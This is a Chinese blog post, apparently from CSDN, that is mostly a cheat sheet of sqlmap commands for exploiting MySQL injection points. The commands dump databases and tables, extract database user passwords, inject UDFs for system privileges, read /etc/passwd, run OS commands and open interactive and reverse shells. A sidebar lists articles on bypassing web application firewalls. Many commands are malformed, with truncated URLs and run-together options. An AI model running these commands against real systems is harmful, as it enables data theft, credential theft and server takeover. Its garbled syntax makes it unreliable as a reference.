sqlmap mysql usage_sqlmap详细使用 [精简]

最新推荐文章于 2023-02-15 17:47:58 发布
最新推荐文章于 2023-02-15 17:47:58 发布
阅读量199 收藏
点赞数
文章标签: sqlmap mysql usage
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42566121/article/details/113683349
版权

其他基础:

sqlmap -u “http://url/news?id=1” –level=3 –smart –dbms “Mysql” –current-user #获取当前用户名称

sqlmap -u “http://www.xxoo.com/news?id=1” –level=3 –smart –dbms “Mysql” –current-db  #获取当前数据库名称

sqlmap -u “http://www.xxoo.com/news?id=1” –level=3 –smart –dbms “Mysql”–tables  -D “db_name” #列表名

sqlmap -u “http://url/news?id=1” –level=3 –smart  –dbms “Mysql” –columns -T “tablename” users-D “db_name” -v 0 #列字段

sqlmap -u “http://url/news?id=1” –level=3 –smart –dbms “Mysql”  –dump  -C “column_name”  -T “table_name” -D “db_name” -v 0   #获取字段内容

******************信息获取******************

sqlmap -u “ –smart –dbms “Mysql” –users  #列数据库用户

sqlmap -u “ –smart –dbms “Mysql” –dbs#列数据库

sqlmap -u “ –smart –dbms “Mysql”–passwords #数据库用户密码

sqlmap -u “ –smart –dbms “Mysql”–passwords-U root  -v 0 #列出指定用户数据库密码

sqlmap -u “ –smart –dbms “Mysql” –dump-all -v 0 #列出所有数据库所有表

sqlmap -u “ –smart –dbms “Mysql”–privileges #查看权限

sqlmap -u “ –smart –dbms “Mysql”–privileges -U root #查看指定用户权限

sqlmap -u “ –smart –dbms “Mysql” –is-dba -v 1 #是否是数据库管理员

sqlmap -u “ –smart –dbms “Mysql” –roles #枚举数据库用户角色

sqlmap -u “ –smart –dbms “Mysql”–udf-inject #导入用户自定义函数(获取系统权限!)

sqlmap -u “ –smart –dbms “Mysql”–dump-all –exclude-sysdbs -v 0 #列出当前库所有表

sqlmap -u “ –smart –dbms “Mysql” –union-check #是否支持union 注入

sqlmap -u “ –smart –dbms “Mysql”–union-cols #union 查询表记录

sqlmap -u “ –smart –dbms “Mysql” –union-test #union 语句测试

sqlmap -u “ –smart –dbms “Mysql” –union-use –banner #采用union 注入

sqlmap -u “ –smart –dbms “Mysql”–union-test –union-tech orderby #union 配合 order by

sqlmap -u “ –smart –dbms “Mysql”–method “POST” — data “id=1&cat=2″ #post注入

sqlmap -u “ –smart –dbms “Mysql”–cookie “COOKIE_VALUE” #cookie注入

sqlmap -u “ –smart –dbms “Mysql”-b #获取banner信息

sqlmap -u “http://url/news?id=1” –level=3 –smart-v 1 -f #指纹判别数据库类型

sqlmap -u “http://url/news?id=1” –level=3 –smart–proxy”http://127.0.0.1:8118” #代理注入

sqlmap -u “http://url/news?id=1″–string”STRING_ON_TRUE_PAGE“  #指定关键词

sqlmap -u “ –smart –dbms “Mysql”–sql-shell #执行指定sql命令

sqlmap -u “ –smart –dbms “Mysql”–file /etc/passwd

sqlmap -u “ –smart –dbms “Mysql”–os-cmd=whoami #执行系统命令

sqlmap -u “ –smart –dbms “Mysql”–os-shell #系统交互shell

sqlmap -u “ –smart –dbms “Mysql”–os-pwn #反弹shell

sqlmap -u “ –smart –dbms “Mysql”–reg-read #读取win系统注册表

sqlmap -u “ –smart –dbms “Mysql” –dbs-o “sqlmap.log” #保存进度

sqlmap -u “ –smart –dbms “Mysql” –dbs  -o “sqlmap.log” –resume  #恢复已保存进度

阿特拉斯大兄弟
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透测试必备神器SQLMAP的所有绕waf脚本合集
10-18
这个脚本合集给出了各种数据库对应的绕waf脚本名称,方便针对各种过滤手段选择对应的脚本 在许多情况下,防火墙只能防御已知的攻击模式和威胁。然而,SQL注入是一种动态的、高度灵活的攻击方式,防火墙很难对其进行全面的防御。SQLMAP利用这一点,通过构造特定的SQL语句,绕过防火墙的检测,直达数据库。 具体来说,SQLMAP首先会尝试猜测应用程序所使用的数据库类型(如MySQL、Oracle等),然后根据该数据库类型的语法和特性,构造出特定的SQL语句。这些语句在防火墙看来可能是正常的、合法的请求,但实际上却包含了恶意的SQL代码,能够导致数据库泄漏数据、甚至完全被控制。 当然,SQLMAP并不是一种万能的工具。它需要使用者具备一定的技术知识和经验,才能正确地使用并获得最佳效果。尽管如此,SQLMAP无疑是一个强大的工具,它可以帮助你发现那些防火墙可能无法检测到的安全风险。 总结起来,SQLMAP是一种强大的、能够绕过防火墙检测的工具。它能够帮助你发现并利用应用程序中的SQL注入漏洞,及时修复这些漏洞,确保你的数据安全。所以,如果你想确保你的应用程序免受潜在威胁的影响,那么SQLMA
Python-Atlas一个开源工具可以建议SQLMap篡改绕WAFIDSIPS
08-10
Atlas - 一个开源工具,可以建议SQLMap篡改绕WAF/IDS/IPS,该工具基于返回的状态代码。
sqlmap mysql usage_SqlMap之数据库操作语句总结
weixin_34577766的博客
02-04 142
SQLMAP是一款开源的渗透测试程序,它可以自动探测和利用SQL注入漏洞来获得我们想要的数据。我们可以利用它执行特定的命令、查看文件、获取各种数据;当然,最猥琐的是它利用注入点拖库的速率还是灰常让人满意的。#> ./sqlmap.py -u “注入地址” -v 1 --dbs // 列举数据库#> ./sqlmap.py -u “注入地址” -v 1 --current-db ...
SQLMap实验
huangbaokang的博客
12-26 1347
一、SQLMap简介 当给 sqlmap 这么一个 url 的时候,它会: 1、判断可注入的参数 2、判断可以用那种 SQL 注入技术来注入 3、识别出哪种数据库 4、根据用户选择,读取哪些数据 sqlmap 支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查 看时间延迟语句是否执行(即页面返回...
sqlmap常用tamper汇总及使用指导
Thunderclap的博客
02-15 1687
sqlmap常用tamper汇总及使用指导
sqlmap自动扫描器.zip_sqlmap_sqlmap扫描器_sql工具
09-23
4. **使用注意事项**:虽然SQLMap是强大的工具,但使用时必须遵守法律和道德规范。未经允许对任何系统进行渗透测试都是非法的。在使用此类工具时,确保你有合法的权限,或者是在自己的测试环境中进行操作。 5. **...
sqlmapproject-sqlmap-1.4.7-26-g84bc264 (1)_sqlmap_tool_
09-30
标题中的"sqlmapproject-sqlmap-1.4.7-26-g84bc264 (1)_sqlmap_tool_"表明我们讨论的是SQLMap的一个特定版本,即1.4.7-26-g84bc264。在本篇文章中,我们将深入探讨SQLMap的功能、工作原理以及如何使用这个强大的工具...
ibatis-sqlmap_2.3.4_2.jar两个版本的jar包
03-05
1. ibatis-sqlmap_2.3.4.jar:这是Ibatis-SqlMap的一个稳定版本,包含了一些bug修复和性能优化。2.3.4版本相比之前的版本可能改进了对复杂查询的支持,提升了处理大数据量时的性能,并修复了可能导致程序崩溃的已知...
SQLMAP使用笔记.pdf
01-25
SQLMAP 使用笔记 SQLMAP 是一个开源的渗透测试工具,用于检测和利用 SQL 注入漏洞。下面是 SQLMAP使用笔记,包括常用参数、选项和示例。 一、SQLMAP 的基本使用 SQLMAP 的基本语法为:`sqlmap -u <url> ...
SQLMAP神器使用.pdf
01-05
sqlmap常见的命令使用以及实验步骤和方法
SQLMapAPI介绍与实践(一)
03-25
SQLMap已经成为我们做渗透测试不可缺少的工具,在这里就不在描述工具的使用,在以往的SQLMap测试中我们大 都是以单个的URL为目标,遇到WAF,防火墙就需要进行手工绕过,或者在参数中加--tamper用SQLMap自带的脚本进行绕过;无论是哪种方式测试效率都是单兵作战,SQLMap的开发人员早已想到了这个问题,所以预留了扫描接口,也就是我们接下来要讲的SQLMapAPI。
图集:快速SQLMap篡改建议程序
01-30
Atlas-快速SQLMap篡改建议v1.0 Atlas是一个开放源代码工具,可以建议sqlmap篡改绕过WAF / IDS / IPS,该工具基于返回的状态代码。 屏幕 安装 $ git clone https://github.com/m4ll0k/Atlas.git atlas $ cd atlas $ python atlas.py # python3+ 用法 $ python atlas.py --url http://site.com/index.php?id=Price_ASC --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v 注入点( %%inject%% ): 得到: $ python atlas.py --url http://site.com/index/id/%%% --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v 帖子: $ python atlas.py --url http://site.com/index/id/
使用sqlmap绕过过滤
08-05
该文档讲解了如何使用sqlmap绕过过滤手段的方法,有兴趣的可以下载看看
sqlmap之(一)----命令详解
fendo
01-02 1万+
一、sqlmap命令介绍 sqlmap文档地址:https://github.com/sqlmapproject/sqlmap/wiki/Usage 摘取了其中的命令参数格式如下 中英对照版: Usage: python sqlmap.py [options] Options(选项): -h, --help Show basic help
sqlmap用法
热门推荐
keepxp的博客
07-28 2万+
Sqlamp Usage https://github.com/sqlmapproject/sqlmap/wiki/Usage Usage: python sqlmap.py [options] Options: -h, --help Show basic help message and exit -hh Show ad
win环境下使用sqlmap写shell + MYSQL提权(默认就是system权限)
weixin_30606461的博客
01-23 1009
今天在来一个mysql提权 (也可以说是默认system权限提的) 在被黑站点找到一个站 先教拿shell是有注入漏洞的 有可能是root权限的注入点 可以确定是有注入漏洞的 也得到了 物理路径 这个是很有用的 如果是root权限的注入点 那我们可以考虑 写shellD:\wamp\www\js\content.php 有时候物理路径是很有用的上sqlmap注入 使用命令 这个是mys...
sqlmap过waf详解
净邪的博客
07-13 5269
WAF又称web应用防火墙,因为它的出现可以忽略很多应用漏洞,但并不是所有waf都可以通过sqlmap绕过,整理了一部分仅供参考sqlmap可以通过脚本拓展的方式调用模块对注入进行参数“打乱”以此达到绕过的效果可以使用命令–tamper 来调用脚本脚本调用大全:https://blog.csdn.net/hxsstar/article/details/22782627命令也大同小异,例如:sqlm...
渗透神器sqlmap使用笔记
煜铭2011
04-14 8655
0x00前言 sqlmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)。该开源软件是国外大神的慷慨赠予。在乌云、补天等等漏洞公开平台,随处可见它的身影,也是渗透人员的必备神器。能够把这神器灵活运用,也是很厉害的一件事情。熟能生巧!! 下载地址:https://github.com/sqlmapproj...
sqlmap mysql shell
最新发布
06-11
你想要了解如何使用SQLMap来获取MySQL Shell访问权限吗?如果是的话,我可以为你提供一些基本的指导。 首先,你需要确保已经安装了SQLMap。接下来,你需要找到一个目标网站或应用程序,它使用MySQL数据库,并且...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值